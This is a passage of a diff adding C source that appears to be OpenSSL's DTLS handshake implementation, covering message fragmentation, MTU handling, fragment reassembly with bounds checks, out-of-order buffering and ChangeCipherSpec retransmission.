+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <limits.h>
+#include <string.h>
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+#define RSMBLY_BITMASK_SIZE(msg_len) (((msg_len) + 7) / 8)
+
+#define RSMBLY_BITMASK_MARK(bitmask, start, end) { \
+                        if ((end) - (start) <= 8) { \
+                                long ii; \
+                                for (ii = (start); ii < (end); ii++) bitmask[((ii) >> 3)] |= (1 << ((ii) & 7)); \
+                        } else { \
+                                long ii; \
+                                bitmask[((start) >> 3)] |= bitmask_start_values[((start) & 7)]; \
+                                for (ii = (((start) >> 3) + 1); ii < ((((end) - 1)) >> 3); ii++) bitmask[ii] = 0xff; \
+                                bitmask[(((end) - 1) >> 3)] |= bitmask_end_values[((end) & 7)]; \
+                        } }
+
+#define RSMBLY_BITMASK_IS_COMPLETE(bitmask, msg_len, is_complete) { \
+                        long ii; \
+                        OPENSSL_assert((msg_len) > 0); \
+                        is_complete = 1; \
+                        if (bitmask[(((msg_len) - 1) >> 3)] != bitmask_end_values[((msg_len) & 7)]) is_complete = 0; \
+                        if (is_complete) for (ii = (((msg_len) - 1) >> 3) - 1; ii >= 0 ; ii--) \
+                                if (bitmask[ii] != 0xff) { is_complete = 0; break; } }
+
+#if 0
+# define RSMBLY_BITMASK_PRINT(bitmask, msg_len) { \
+                        long ii; \
+                        printf("bitmask: "); for (ii = 0; ii < (msg_len); ii++) \
+                        printf("%d ", (bitmask[ii >> 3] & (1 << (ii & 7))) >> (ii & 7)); \
+                        printf("\n"); }
+#endif
+
+static unsigned char bitmask_start_values[] =
+    { 0xff, 0xfe, 0xfc, 0xf8, 0xf0, 0xe0, 0xc0, 0x80 };
+static unsigned char bitmask_end_values[] =
+    { 0xff, 0x01, 0x03, 0x07, 0x0f, 0x1f, 0x3f, 0x7f };
+
+/* XDTLS:  figure out the right values */
+static const unsigned int g_probable_mtu[] = { 1500, 512, 256 };
+
+static void dtls1_fix_message_header(SSL *s, unsigned long frag_off,
+                                     unsigned long frag_len);
+static unsigned char *dtls1_write_message_header(SSL *s, unsigned char *p);
+static void dtls1_set_message_header_int(SSL *s, unsigned char mt,
+                                         unsigned long len,
+                                         unsigned short seq_num,
+                                         unsigned long frag_off,
+                                         unsigned long frag_len);
+static long dtls1_get_message_fragment(SSL *s, int st1, int stn, long max,
+                                       int *ok);
+
+static hm_fragment *dtls1_hm_fragment_new(unsigned long frag_len,
+                                          int reassembly)
+{
+    hm_fragment *frag = NULL;
+    unsigned char *buf = NULL;
+    unsigned char *bitmask = NULL;
+
+    frag = (hm_fragment *)OPENSSL_malloc(sizeof(hm_fragment));
+    if (frag == NULL)
+        return NULL;
+
+    if (frag_len) {
+        buf = (unsigned char *)OPENSSL_malloc(frag_len);
+        if (buf == NULL) {
+            OPENSSL_free(frag);
+            return NULL;
+        }
+    }
+
+    /* zero length fragment gets zero frag->fragment */
+    frag->fragment = buf;
+
+    /* Initialize reassembly bitmask if necessary */
+    if (reassembly) {
+        bitmask =
+            (unsigned char *)OPENSSL_malloc(RSMBLY_BITMASK_SIZE(frag_len));
+        if (bitmask == NULL) {
+            if (buf != NULL)
+                OPENSSL_free(buf);
+            OPENSSL_free(frag);
+            return NULL;
+        }
+        memset(bitmask, 0, RSMBLY_BITMASK_SIZE(frag_len));
+    }
+
+    frag->reassembly = bitmask;
+
+    return frag;
+}
+
+void dtls1_hm_fragment_free(hm_fragment *frag)
+{
+
+    if (frag->msg_header.is_ccs) {
+        EVP_CIPHER_CTX_free(frag->msg_header.
+                            saved_retransmit_state.enc_write_ctx);
+        EVP_MD_CTX_destroy(frag->msg_header.
+                           saved_retransmit_state.write_hash);
+    }
+    if (frag->fragment)
+        OPENSSL_free(frag->fragment);
+    if (frag->reassembly)
+        OPENSSL_free(frag->reassembly);
+    OPENSSL_free(frag);
+}
+
+static int dtls1_query_mtu(SSL *s)
+{
+    if (s->d1->link_mtu) {
+        s->d1->mtu =
+            s->d1->link_mtu - BIO_dgram_get_mtu_overhead(SSL_get_wbio(s));
+        s->d1->link_mtu = 0;
+    }
+
+    /* AHA!  Figure out the MTU, and stick to the right size */
+    if (s->d1->mtu < dtls1_min_mtu(s)) {
+        if (!(SSL_get_options(s) & SSL_OP_NO_QUERY_MTU)) {
+            s->d1->mtu =
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_QUERY_MTU, 0, NULL);
+
+            /*
+             * I've seen the kernel return bogus numbers when it doesn't know
+             * (initial write), so just make sure we have a reasonable number
+             */
+            if (s->d1->mtu < dtls1_min_mtu(s)) {
+                /* Set to min mtu */
+                s->d1->mtu = dtls1_min_mtu(s);
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SET_MTU,
+                         s->d1->mtu, NULL);
+            }
+        } else
+            return 0;
+    }
+    return 1;
+}
+
+/*
+ * send s->init_buf in records of type 'type' (SSL3_RT_HANDSHAKE or
+ * SSL3_RT_CHANGE_CIPHER_SPEC)
+ */
+int dtls1_do_write(SSL *s, int type)
+{
+    int ret;
+    unsigned int curr_mtu;
+    int retry = 1;
+    unsigned int len, frag_off, mac_size, blocksize, used_len;
+
+    if (!dtls1_query_mtu(s))
+        return -1;
+
+    OPENSSL_assert(s->d1->mtu >= dtls1_min_mtu(s)); /* should have something
+                                                     * reasonable now */
+
+    if (s->init_off == 0 && type == SSL3_RT_HANDSHAKE)
+        OPENSSL_assert(s->init_num ==
+                       (int)s->d1->w_msg_hdr.msg_len +
+                       DTLS1_HM_HEADER_LENGTH);
+
+    if (s->write_hash) {
+        if (s->enc_write_ctx
+            && EVP_CIPHER_CTX_mode(s->enc_write_ctx) == EVP_CIPH_GCM_MODE)
+            mac_size = 0;
+        else
+            mac_size = EVP_MD_CTX_size(s->write_hash);
+    } else
+        mac_size = 0;
+
+    if (s->enc_write_ctx &&
+        (EVP_CIPHER_CTX_mode(s->enc_write_ctx) == EVP_CIPH_CBC_MODE))
+        blocksize = 2 * EVP_CIPHER_block_size(s->enc_write_ctx->cipher);
+    else
+        blocksize = 0;
+
+    frag_off = 0;
+    /* s->init_num shouldn't ever be < 0...but just in case */
+    while (s->init_num > 0) {
+        used_len = BIO_wpending(SSL_get_wbio(s)) + DTLS1_RT_HEADER_LENGTH
+            + mac_size + blocksize;
+        if (s->d1->mtu > used_len)
+            curr_mtu = s->d1->mtu - used_len;
+        else
+            curr_mtu = 0;
+
+        if (curr_mtu <= DTLS1_HM_HEADER_LENGTH) {
+            /*
+             * grr.. we could get an error if MTU picked was wrong
+             */
+            ret = BIO_flush(SSL_get_wbio(s));
+            if (ret <= 0)
+                return ret;
+            used_len = DTLS1_RT_HEADER_LENGTH + mac_size + blocksize;
+            if (s->d1->mtu > used_len + DTLS1_HM_HEADER_LENGTH) {
+                curr_mtu = s->d1->mtu - used_len;
+            } else {
+                /* Shouldn't happen */
+                return -1;
+            }
+        }
+
+        /*
+         * We just checked that s->init_num > 0 so this cast should be safe
+         */
+        if (((unsigned int)s->init_num) > curr_mtu)
+            len = curr_mtu;
+        else
+            len = s->init_num;
+
+        /* Shouldn't ever happen */
+        if (len > INT_MAX)
+            len = INT_MAX;
+
+        /*
+         * XDTLS: this function is too long.  split out the CCS part
+         */
+        if (type == SSL3_RT_HANDSHAKE) {
+            if (s->init_off != 0) {
+                OPENSSL_assert(s->init_off > DTLS1_HM_HEADER_LENGTH);
+                s->init_off -= DTLS1_HM_HEADER_LENGTH;
+                s->init_num += DTLS1_HM_HEADER_LENGTH;
+
+                /*
+                 * We just checked that s->init_num > 0 so this cast should
+                 * be safe
+                 */
+                if (((unsigned int)s->init_num) > curr_mtu)
+                    len = curr_mtu;
+                else
+                    len = s->init_num;
+            }
+
+            /* Shouldn't ever happen */
+            if (len > INT_MAX)
+                len = INT_MAX;
+
+            if (len < DTLS1_HM_HEADER_LENGTH) {
+                /*
+                 * len is so small that we really can't do anything sensible
+                 * so fail
+                 */
+                return -1;
+            }
+            dtls1_fix_message_header(s, frag_off,
+                                     len - DTLS1_HM_HEADER_LENGTH);
+
+            dtls1_write_message_header(s,
+                                       (unsigned char *)&s->init_buf->
+                                       data[s->init_off]);
+        }
+
+        ret = dtls1_write_bytes(s, type, &s->init_buf->data[s->init_off],
+                                len);
+        if (ret < 0) {
+            /*
+             * might need to update MTU here, but we don't know which
+             * previous packet caused the failure -- so can't really
+             * retransmit anything.  continue as if everything is fine and
+             * wait for an alert to handle the retransmit
+             */
+            if (retry && BIO_ctrl(SSL_get_wbio(s),
+                                  BIO_CTRL_DGRAM_MTU_EXCEEDED, 0, NULL) > 0) {
+                if (!(SSL_get_options(s) & SSL_OP_NO_QUERY_MTU)) {
+                    if (!dtls1_query_mtu(s))
+                        return -1;
+                    /* Have one more go */
+                    retry = 0;
+                } else
+                    return -1;
+            } else {
+                return (-1);
+            }
+        } else {
+
+            /*
+             * bad if this assert fails, only part of the handshake message
+             * got sent.  but why would this happen?
+             */
+            OPENSSL_assert(len == (unsigned int)ret);
+
+            if (type == SSL3_RT_HANDSHAKE && !s->d1->retransmitting) {
+                /*
+                 * should not be done for 'Hello Request's, but in that case
+                 * we'll ignore the result anyway
+                 */
+                unsigned char *p =
+                    (unsigned char *)&s->init_buf->data[s->init_off];
+                const struct hm_header_st *msg_hdr = &s->d1->w_msg_hdr;
+                int xlen;
+
+                if (frag_off == 0 && s->version != DTLS1_BAD_VER) {
+                    /*
+                     * reconstruct message header is if it is being sent in
+                     * single fragment
+                     */
+                    *p++ = msg_hdr->type;
+                    l2n3(msg_hdr->msg_len, p);
+                    s2n(msg_hdr->seq, p);
+                    l2n3(0, p);
+                    l2n3(msg_hdr->msg_len, p);
+                    p -= DTLS1_HM_HEADER_LENGTH;
+                    xlen = ret;
+                } else {
+                    p += DTLS1_HM_HEADER_LENGTH;
+                    xlen = ret - DTLS1_HM_HEADER_LENGTH;
+                }
+
+                ssl3_finish_mac(s, p, xlen);
+            }
+
+            if (ret == s->init_num) {
+                if (s->msg_callback)
+                    s->msg_callback(1, s->version, type, s->init_buf->data,
+                                    (size_t)(s->init_off + s->init_num), s,
+                                    s->msg_callback_arg);
+
+                s->init_off = 0; /* done writing this message */
+                s->init_num = 0;
+
+                return (1);
+            }
+            s->init_off += ret;
+            s->init_num -= ret;
+            frag_off += (ret -= DTLS1_HM_HEADER_LENGTH);
+        }
+    }
+    return (0);
+}
+
+/*
+ * Obtain handshake message of message type 'mt' (any if mt == -1), maximum
+ * acceptable body length 'max'. Read an entire handshake message.  Handshake
+ * messages arrive in fragments.
+ */
+long dtls1_get_message(SSL *s, int st1, int stn, int mt, long max, int *ok)
+{
+    int i, al;
+    struct hm_header_st *msg_hdr;
+    unsigned char *p;
+    unsigned long msg_len;
+
+    /*
+     * s3->tmp is used to store messages that are unexpected, caused by the
+     * absence of an optional handshake message
+     */
+    if (s->s3->tmp.reuse_message) {
+        s->s3->tmp.reuse_message = 0;
+        if ((mt >= 0) && (s->s3->tmp.message_type != mt)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_DTLS1_GET_MESSAGE, SSL_R_UNEXPECTED_MESSAGE);
+            goto f_err;
+        }
+        *ok = 1;
+        s->init_msg = s->init_buf->data + DTLS1_HM_HEADER_LENGTH;
+        s->init_num = (int)s->s3->tmp.message_size;
+        return s->init_num;
+    }
+
+    msg_hdr = &s->d1->r_msg_hdr;
+    memset(msg_hdr, 0x00, sizeof(struct hm_header_st));
+
+ again:
+    i = dtls1_get_message_fragment(s, st1, stn, max, ok);
+    if (i == DTLS1_HM_BAD_FRAGMENT || i == DTLS1_HM_FRAGMENT_RETRY) {
+        /* bad fragment received */
+        goto again;
+    } else if (i <= 0 && !*ok) {
+        return i;
+    }
+
+    p = (unsigned char *)s->init_buf->data;
+    msg_len = msg_hdr->msg_len;
+
+    /* reconstruct message header */
+    *(p++) = msg_hdr->type;
+    l2n3(msg_len, p);
+    s2n(msg_hdr->seq, p);
+    l2n3(0, p);
+    l2n3(msg_len, p);
+    if (s->version != DTLS1_BAD_VER) {
+        p -= DTLS1_HM_HEADER_LENGTH;
+        msg_len += DTLS1_HM_HEADER_LENGTH;
+    }
+
+    ssl3_finish_mac(s, p, msg_len);
+    if (s->msg_callback)
+        s->msg_callback(0, s->version, SSL3_RT_HANDSHAKE,
+                        p, msg_len, s, s->msg_callback_arg);
+
+    memset(msg_hdr, 0x00, sizeof(struct hm_header_st));
+
+    /* Don't change sequence numbers while listening */
+    if (!s->d1->listen)
+        s->d1->handshake_read_seq++;
+
+    s->init_msg = s->init_buf->data + DTLS1_HM_HEADER_LENGTH;
+    return s->init_num;
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    *ok = 0;
+    return -1;
+}
+
+static int dtls1_preprocess_fragment(SSL *s, struct hm_header_st *msg_hdr,
+                                     int max)
+{
+    size_t frag_off, frag_len, msg_len;
+
+    msg_len = msg_hdr->msg_len;
+    frag_off = msg_hdr->frag_off;
+    frag_len = msg_hdr->frag_len;
+
+    /* sanity checking */
+    if ((frag_off + frag_len) > msg_len) {
+        SSLerr(SSL_F_DTLS1_PREPROCESS_FRAGMENT, SSL_R_EXCESSIVE_MESSAGE_SIZE);
+        return SSL_AD_ILLEGAL_PARAMETER;
+    }
+
+    if ((frag_off + frag_len) > (unsigned long)max) {
+        SSLerr(SSL_F_DTLS1_PREPROCESS_FRAGMENT, SSL_R_EXCESSIVE_MESSAGE_SIZE);
+        return SSL_AD_ILLEGAL_PARAMETER;
+    }
+
+    if (s->d1->r_msg_hdr.frag_off == 0) { /* first fragment */
+        /*
+         * msg_len is limited to 2^24, but is effectively checked against max
+         * above
+         */
+        if (!BUF_MEM_grow_clean
+            (s->init_buf, msg_len + DTLS1_HM_HEADER_LENGTH)) {
+            SSLerr(SSL_F_DTLS1_PREPROCESS_FRAGMENT, ERR_R_BUF_LIB);
+            return SSL_AD_INTERNAL_ERROR;
+        }
+
+        s->s3->tmp.message_size = msg_len;
+        s->d1->r_msg_hdr.msg_len = msg_len;
+        s->s3->tmp.message_type = msg_hdr->type;
+        s->d1->r_msg_hdr.type = msg_hdr->type;
+        s->d1->r_msg_hdr.seq = msg_hdr->seq;
+    } else if (msg_len != s->d1->r_msg_hdr.msg_len) {
+        /*
+         * They must be playing with us! BTW, failure to enforce upper limit
+         * would open possibility for buffer overrun.
+         */
+        SSLerr(SSL_F_DTLS1_PREPROCESS_FRAGMENT, SSL_R_EXCESSIVE_MESSAGE_SIZE);
+        return SSL_AD_ILLEGAL_PARAMETER;
+    }
+
+    return 0;                   /* no error */
+}
+
+static int dtls1_retrieve_buffered_fragment(SSL *s, long max, int *ok)
+{
+    /*-
+     * (0) check whether the desired fragment is available
+     * if so:
+     * (1) copy over the fragment to s->init_buf->data[]
+     * (2) update s->init_num
+     */
+    pitem *item;
+    hm_fragment *frag;
+    int al;
+
+    *ok = 0;
+    item = pqueue_peek(s->d1->buffered_messages);
+    if (item == NULL)
+        return 0;
+
+    frag = (hm_fragment *)item->data;
+
+    /* Don't return if reassembly still in progress */
+    if (frag->reassembly != NULL)
+        return 0;
+
+    if (s->d1->handshake_read_seq == frag->msg_header.seq) {
+        unsigned long frag_len = frag->msg_header.frag_len;
+        pqueue_pop(s->d1->buffered_messages);
+
+        al = dtls1_preprocess_fragment(s, &frag->msg_header, max);
+
+        if (al == 0) {          /* no alert */
+            unsigned char *p =
+                (unsigned char *)s->init_buf->data + DTLS1_HM_HEADER_LENGTH;
+            memcpy(&p[frag->msg_header.frag_off], frag->fragment,
+                   frag->msg_header.frag_len);
+        }
+
+        dtls1_hm_fragment_free(frag);
+        pitem_free(item);
+
+        if (al == 0) {
+            *ok = 1;
+            return frag_len;
+        }
+
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+        s->init_num = 0;
+        *ok = 0;
+        return -1;
+    } else
+        return 0;
+}
+
+/*
+ * dtls1_max_handshake_message_len returns the maximum number of bytes
+ * permitted in a DTLS handshake message for |s|. The minimum is 16KB, but
+ * may be greater if the maximum certificate list size requires it.
+ */
+static unsigned long dtls1_max_handshake_message_len(const SSL *s)
+{
+    unsigned long max_len =
+        DTLS1_HM_HEADER_LENGTH + SSL3_RT_MAX_ENCRYPTED_LENGTH;
+    if (max_len < (unsigned long)s->max_cert_list)
+        return s->max_cert_list;
+    return max_len;
+}
+
+static int
+dtls1_reassemble_fragment(SSL *s, const struct hm_header_st *msg_hdr, int *ok)
+{
+    hm_fragment *frag = NULL;
+    pitem *item = NULL;
+    int i = -1, is_complete;
+    unsigned char seq64be[8];
+    unsigned long frag_len = msg_hdr->frag_len;
+
+    if ((msg_hdr->frag_off + frag_len) > msg_hdr->msg_len ||
+        msg_hdr->msg_len > dtls1_max_handshake_message_len(s))
+        goto err;
+
+    if (frag_len == 0)
+        return DTLS1_HM_FRAGMENT_RETRY;
+
+    /* Try to find item in queue */
+    memset(seq64be, 0, sizeof(seq64be));
+    seq64be[6] = (unsigned char)(msg_hdr->seq >> 8);
+    seq64be[7] = (unsigned char)msg_hdr->seq;
+    item = pqueue_find(s->d1->buffered_messages, seq64be);
+
+    if (item == NULL) {
+        frag = dtls1_hm_fragment_new(msg_hdr->msg_len, 1);
+        if (frag == NULL)
+            goto err;
+        memcpy(&(frag->msg_header), msg_hdr, sizeof(*msg_hdr));
+        frag->msg_header.frag_len = frag->msg_header.msg_len;
+        frag->msg_header.frag_off = 0;
+    } else {
+        frag = (hm_fragment *)item->data;
+        if (frag->msg_header.msg_len != msg_hdr->msg_len) {
+            item = NULL;
+            frag = NULL;
+            goto err;
+        }
+    }
+
+    /*
+     * If message is already reassembled, this must be a retransmit and can
+     * be dropped. In this case item != NULL and so frag does not need to be
+     * freed.
+     */
+    if (frag->reassembly == NULL) {
+        unsigned char devnull[256];
+
+        while (frag_len) {
+            i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE,
+                                          devnull,
+                                          frag_len >
+                                          sizeof(devnull) ? sizeof(devnull) :
+                                          frag_len, 0);
+            if (i <= 0)
+                goto err;
+            frag_len -= i;
+        }
+        return DTLS1_HM_FRAGMENT_RETRY;
+    }
+
+    /* read the body of the fragment (header has already been read */
+    i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE,
+                                  frag->fragment + msg_hdr->frag_off,
+                                  frag_len, 0);
+    if ((unsigned long)i != frag_len)
+        i = -1;
+    if (i <= 0)
+        goto err;
+
+    RSMBLY_BITMASK_MARK(frag->reassembly, (long)msg_hdr->frag_off,
+                        (long)(msg_hdr->frag_off + frag_len));
+
+    RSMBLY_BITMASK_IS_COMPLETE(frag->reassembly, (long)msg_hdr->msg_len,
+                               is_complete);
+
+    if (is_complete) {
+        OPENSSL_free(frag->reassembly);
+        frag->reassembly = NULL;
+    }
+
+    if (item == NULL) {
+        item = pitem_new(seq64be, frag);
+        if (item == NULL) {
+            i = -1;
+            goto err;
+        }
+
+        item = pqueue_insert(s->d1->buffered_messages, item);
+        /*
+         * pqueue_insert fails iff a duplicate item is inserted. However,
+         * |item| cannot be a duplicate. If it were, |pqueue_find|, above,
+         * would have returned it and control would never have reached this
+         * branch.
+         */
+        OPENSSL_assert(item != NULL);
+    }
+
+    return DTLS1_HM_FRAGMENT_RETRY;
+
+ err:
+    if (frag != NULL && item == NULL)
+        dtls1_hm_fragment_free(frag);
+    *ok = 0;
+    return i;
+}
+
+static int
+dtls1_process_out_of_seq_message(SSL *s, const struct hm_header_st *msg_hdr,
+                                 int *ok)
+{
+    int i = -1;
+    hm_fragment *frag = NULL;
+    pitem *item = NULL;
+    unsigned char seq64be[8];
+    unsigned long frag_len = msg_hdr->frag_len;
+
+    if ((msg_hdr->frag_off + frag_len) > msg_hdr->msg_len)
+        goto err;
+
+    /* Try to find item in queue, to prevent duplicate entries */
+    memset(seq64be, 0, sizeof(seq64be));
+    seq64be[6] = (unsigned char)(msg_hdr->seq >> 8);
+    seq64be[7] = (unsigned char)msg_hdr->seq;
+    item = pqueue_find(s->d1->buffered_messages, seq64be);
+
+    /*
+     * If we already have an entry and this one is a fragment, don't discard
+     * it and rather try to reassemble it.
+     */
+    if (item != NULL && frag_len != msg_hdr->msg_len)
+        item = NULL;
+
+    /*
+     * Discard the message if sequence number was already there, is too far
+     * in the future, already in the queue or if we received a FINISHED
+     * before the SERVER_HELLO, which then must be a stale retransmit.
+     */
+    if (msg_hdr->seq <= s->d1->handshake_read_seq ||
+        msg_hdr->seq > s->d1->handshake_read_seq + 10 || item != NULL ||
+        (s->d1->handshake_read_seq == 0 && msg_hdr->type == SSL3_MT_FINISHED))
+    {
+        unsigned char devnull[256];
+
+        while (frag_len) {
+            i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE,
+                                          devnull,
+                                          frag_len >
+                                          sizeof(devnull) ? sizeof(devnull) :
+                                          frag_len, 0);
+            if (i <= 0)
+                goto err;
+            frag_len -= i;
+        }
+    } else {
+        if (frag_len != msg_hdr->msg_len)
+            return dtls1_reassemble_fragment(s, msg_hdr, ok);
+
+        if (frag_len > dtls1_max_handshake_message_len(s))
+            goto err;
+
+        frag = dtls1_hm_fragment_new(frag_len, 0);
+        if (frag == NULL)
+            goto err;
+
+        memcpy(&(frag->msg_header), msg_hdr, sizeof(*msg_hdr));
+
+        if (frag_len) {
+            /*
+             * read the body of the fragment (header has already been read
+             */
+            i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE,
+                                          frag->fragment, frag_len, 0);
+            if ((unsigned long)i != frag_len)
+                i = -1;
+            if (i <= 0)
+                goto err;
+        }
+
+        item = pitem_new(seq64be, frag);
+        if (item == NULL)
+            goto err;
+
+        item = pqueue_insert(s->d1->buffered_messages, item);
+        /*
+         * pqueue_insert fails iff a duplicate item is inserted. However,
+         * |item| cannot be a duplicate. If it were, |pqueue_find|, above,
+         * would have returned it. Then, either |frag_len| !=
+         * |msg_hdr->msg_len| in which case |item| is set to NULL and it will
+         * have been processed with |dtls1_reassemble_fragment|, above, or
+         * the record will have been discarded.
+         */
+        OPENSSL_assert(item != NULL);
+    }
+
+    return DTLS1_HM_FRAGMENT_RETRY;
+
+ err:
+    if (frag != NULL && item == NULL)
+        dtls1_hm_fragment_free(frag);
+    *ok = 0;
+    return i;
+}
+
+static long
+dtls1_get_message_fragment(SSL *s, int st1, int stn, long max, int *ok)
+{
+    unsigned char wire[DTLS1_HM_HEADER_LENGTH];
+    unsigned long len, frag_off, frag_len;
+    int i, al;
+    struct hm_header_st msg_hdr;
+
+ redo:
+    /* see if we have the required fragment already */
+    if ((frag_len = dtls1_retrieve_buffered_fragment(s, max, ok)) || *ok) {
+        if (*ok)
+            s->init_num = frag_len;
+        return frag_len;
+    }
+
+    /* read handshake message header */
+    i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE, wire,
+                                  DTLS1_HM_HEADER_LENGTH, 0);
+    if (i <= 0) {               /* nbio, or an error */
+        s->rwstate = SSL_READING;
+        *ok = 0;
+        return i;
+    }
+    /* Handshake fails if message header is incomplete */
+    if (i != DTLS1_HM_HEADER_LENGTH) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_DTLS1_GET_MESSAGE_FRAGMENT, SSL_R_UNEXPECTED_MESSAGE);
+        goto f_err;
+    }
+
+    /* parse the message fragment header */
+    dtls1_get_message_header(wire, &msg_hdr);
+
+    /*
+     * if this is a future (or stale) message it gets buffered
+     * (or dropped)--no further processing at this time
+     * While listening, we accept seq 1 (ClientHello with cookie)
+     * although we're still expecting seq 0 (ClientHello)
+     */
+    if (msg_hdr.seq != s->d1->handshake_read_seq
+        && !(s->d1->listen && msg_hdr.seq == 1))
+        return dtls1_process_out_of_seq_message(s, &msg_hdr, ok);
+
+    len = msg_hdr.msg_len;
+    frag_off = msg_hdr.frag_off;
+    frag_len = msg_hdr.frag_len;
+
+    if (frag_len && frag_len < len)
+        return dtls1_reassemble_fragment(s, &msg_hdr, ok);
+
+    if (!s->server && s->d1->r_msg_hdr.frag_off == 0 &&
+        wire[0] == SSL3_MT_HELLO_REQUEST) {
+        /*
+         * The server may always send 'Hello Request' messages -- we are
+         * doing a handshake anyway now, so ignore them if their format is
+         * correct. Does not count for 'Finished' MAC.
+         */
+        if (wire[1] == 0 && wire[2] == 0 && wire[3] == 0) {
+            if (s->msg_callback)
+                s->msg_callback(0, s->version, SSL3_RT_HANDSHAKE,
+                                wire, DTLS1_HM_HEADER_LENGTH, s,
+                                s->msg_callback_arg);
+
+            s->init_num = 0;
+            goto redo;
+        } else {                /* Incorrectly formated Hello request */
+
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_DTLS1_GET_MESSAGE_FRAGMENT,
+                   SSL_R_UNEXPECTED_MESSAGE);
+            goto f_err;
+        }
+    }
+
+    if ((al = dtls1_preprocess_fragment(s, &msg_hdr, max)))
+        goto f_err;
+
+    /* XDTLS:  ressurect this when restart is in place */
+    s->state = stn;
+
+    if (frag_len > 0) {
+        unsigned char *p =
+            (unsigned char *)s->init_buf->data + DTLS1_HM_HEADER_LENGTH;
+
+        i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE,
+                                      &p[frag_off], frag_len, 0);
+        /*
+         * XDTLS: fix this--message fragments cannot span multiple packets
+         */
+        if (i <= 0) {
+            s->rwstate = SSL_READING;
+            *ok = 0;
+            return i;
+        }
+    } else
+        i = 0;
+
+    /*
+     * XDTLS: an incorrectly formatted fragment should cause the handshake
+     * to fail
+     */
+    if (i != (int)frag_len) {
+        al = SSL3_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_DTLS1_GET_MESSAGE_FRAGMENT, SSL3_AD_ILLEGAL_PARAMETER);
+        goto f_err;
+    }
+
+    *ok = 1;
+
+    /*
+     * Note that s->init_num is *not* used as current offset in
+     * s->init_buf->data, but as a counter summing up fragments' lengths: as
+     * soon as they sum up to handshake packet length, we assume we have got
+     * all the fragments.
+     */
+    s->init_num = frag_len;
+    return frag_len;
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    s->init_num = 0;
+
+    *ok = 0;
+    return (-1);
+}
+
+/*-
+ * for these 2 messages, we need to
+ * ssl->enc_read_ctx                    re-init
+ * ssl->s3->read_sequence               zero
+ * ssl->s3->read_mac_secret             re-init
+ * ssl->session->read_sym_enc           assign
+ * ssl->session->read_compression       assign
+ * ssl->session->read_hash              assign
+ */
+int dtls1_send_change_cipher_spec(SSL *s, int a, int b)
+{
+    unsigned char *p;
+
+    if (s->state == a) {
+        p = (unsigned char *)s->init_buf->data;
+        *p++ = SSL3_MT_CCS;
+        s->d1->handshake_write_seq = s->d1->next_handshake_write_seq;
+        s->init_num = DTLS1_CCS_HEADER_LENGTH;
+
+        if (s->version == DTLS1_BAD_VER) {
+            s->d1->next_handshake_write_seq++;
+            s2n(s->d1->handshake_write_seq, p);
+            s->init_num += 2;
+        }
+
+        s->init_off = 0;
+
+        dtls1_set_message_header_int(s, SSL3_MT_CCS, 0,
+                                     s->d1->handshake_write_seq, 0, 0);
+
+        /* buffer the message to handle re-xmits */
+        dtls1_buffer_message(s, 1);
+
+        s->state = b;
+    }
+
+    /* SSL3_ST_CW_CHANGE_B */
+    return (dtls1_do_write(s, SSL3_RT_CHANGE_CIPHER_SPEC));
+}
+
+int dtls1_read_failed(SSL *s, int code)
+{
+    if (code > 0) {
+        fprintf(stderr, "invalid state reached %s:%d", __FILE__, __LINE__);
+        return 1;
+    }
+
+    if (!dtls1_is_timer_expired(s)) {
+        /*
+         * not a timeout, none of our business, let higher layers handle
+         * this.  in fact it's probably an error
+         */
+        return code;
+    }
+#ifndef OPENSSL_NO_HEARTBEATS
+    /* done, no need to send a retransmit */
+    if (!SSL_in_init(s) && !s->tlsext_hb_pending)
+#else
+    /* done, no need to send a retransmit */
+    if (!SSL_in_init(s))
+#endif
+    {
+        BIO_set_flags(SSL_get_rbio(s), BIO_FLAGS_READ);
+        return code;
+    }
+#if 0                           /* for now, each alert contains only one
+                                 * record number */
+    item = pqueue_peek(state->rcvd_records);
+    if (item) {
+        /* send an alert immediately for all the missing records */
+    } else
+#endif
+
+#if 0                           /* no more alert sending, just retransmit the
+                                 * last set of messages */
+    if (state->timeout.read_timeouts >= DTLS1_TMO_READ_COUNT)
+        ssl3_send_alert(s, SSL3_AL_WARNING,
+                        DTLS1_AD_MISSING_HANDSHAKE_MESSAGE);
+#endif
+
+    return dtls1_handle_timeout(s);
+}
+
+int dtls1_get_queue_priority(unsigned short seq, int is_ccs)
+{
+    /*
+     * The index of the retransmission queue actually is the message sequence
+     * number, since the queue only contains messages of a single handshake.
+     * However, the ChangeCipherSpec has no message sequence number and so
+     * using only the sequence will result in the CCS and Finished having the
+     * same index. To prevent this, the sequence number is multiplied by 2.
+     * In case of a CCS 1 is subtracted. This does not only differ CSS and
+     * Finished, it also maintains the order of the index (important for
+     * priority queues) and fits in the unsigned short variable.
+     */
+    return seq * 2 - is_ccs;
+}
+
+int dtls1_retransmit_buffered_messages(SSL *s)
